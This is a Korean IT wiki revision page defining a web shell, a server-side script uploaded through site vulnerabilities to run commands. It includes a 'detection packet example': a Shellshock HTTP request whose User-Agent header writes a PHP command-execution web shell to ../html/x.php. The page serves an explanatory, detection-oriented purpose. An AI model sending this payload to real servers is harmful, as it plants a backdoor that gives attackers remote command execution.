웹셸: Difference between revisions
From IT위키
(새 문서: Web Shell; 웹페이지에서 서버에 명령어를 실행하기 위해 만들어진 프로그램 * 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다. * 웹...) |
No edit summary |
||
| Line 3: | Line 3: | ||
* 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다. | * 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다. | ||
* 웹 사이트의 다양한 취약점을 이용해 웹 서버에 업로드한 후 실행시키기 위한 용도로 사용한다. | * 웹 사이트의 다양한 취약점을 이용해 웹 서버에 업로드한 후 실행시키기 위한 용도로 사용한다. | ||
== 탐지 패킷 예제 == | |||
<pre> | |||
GET /cgi-bin/bash_vul.cgi HTTP/1.1 | |||
Accept: text/html, application/xhtml+xml, */* | |||
Accept-Language: ko-KR | |||
User-Agent: ( ){ :; }; echo "<?\$cmd=\$_REQUEST[\"cmd\"]; if(\$cmd !=\"\"){print shell_exec(\$cmd);}?>" >../html/x.php | |||
Accept-Encoding: gzip, deflate | |||
</pre> | |||
Revision as of 20:23, 25 May 2018
Web Shell; 웹페이지에서 서버에 명령어를 실행하기 위해 만들어진 프로그램
- 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다.
- 웹 사이트의 다양한 취약점을 이용해 웹 서버에 업로드한 후 실행시키기 위한 용도로 사용한다.
탐지 패킷 예제
GET /cgi-bin/bash_vul.cgi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: ( ){ :; }; echo "<?\$cmd=\$_REQUEST[\"cmd\"]; if(\$cmd !=\"\"){print shell_exec(\$cmd);}?>" >../html/x.php
Accept-Encoding: gzip, deflate
